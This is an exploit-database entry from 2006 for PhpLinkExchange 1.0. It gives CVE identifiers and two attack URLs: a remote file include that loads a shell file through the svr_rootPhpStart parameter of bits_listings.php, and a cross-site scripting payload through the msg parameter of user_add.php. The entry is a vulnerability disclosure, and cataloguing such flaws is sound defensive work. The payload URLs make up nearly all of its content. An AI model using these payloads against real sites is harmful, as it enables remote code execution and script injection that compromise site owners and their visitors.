[] NeoSense

PhpLinkExchange 1.0 - Include / Cross-Site Scripting

Author: s3rv3r_hack3r
type: webapps
platform: php
port: 
date_added: 2006-09-10 
date_updated:  
verified: 1 
codes: OSVDB-32157;CVE-2006-4742;OSVDB-32156;CVE-2006-4741 
tags: 
aliases:  
screenshot_url:  
application_url: 

vendor :www.idevspot.com

Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange

By : s3rv3r_hack3r

www: hackerz.ir & h4ckerz.com

remote file include :

http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?]

xss:

http://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss]

# milw0rm.com [2006-09-11]